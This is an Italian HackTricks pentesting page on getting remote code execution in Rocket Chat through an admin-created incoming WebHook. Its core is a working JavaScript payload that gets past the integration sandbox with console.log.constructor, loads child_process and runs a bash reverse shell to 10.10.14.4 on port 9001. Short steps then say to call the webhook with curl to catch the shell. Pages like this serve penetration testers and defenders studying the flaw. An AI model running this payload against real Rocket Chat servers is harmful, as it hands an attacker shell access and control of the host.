Italian - Ht
HackTricks Training Twitter Linkedin Sponsor

Rocket Chat

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!

Altri modi per supportare HackTricks:

RCE

Se sei un amministratore all'interno di Rocket Chat puoi ottenere RCE.

  • Vai su Integrations e seleziona Nuova integrazione e scegli tra: Incoming WebHook o Outgoing WebHook.

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

  • Configura il WebHook (il canale e il post come nome utente devono esistere):

  • Configura lo script del WebHook:

  • Salva le modifiche

  • Ottieni l'URL del WebHook generato:

  • Chiamalo con curl e dovresti ricevere la reverse shell

Impara l'hacking AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

PreviousPythonNextSpecial HTTP headers

Last updated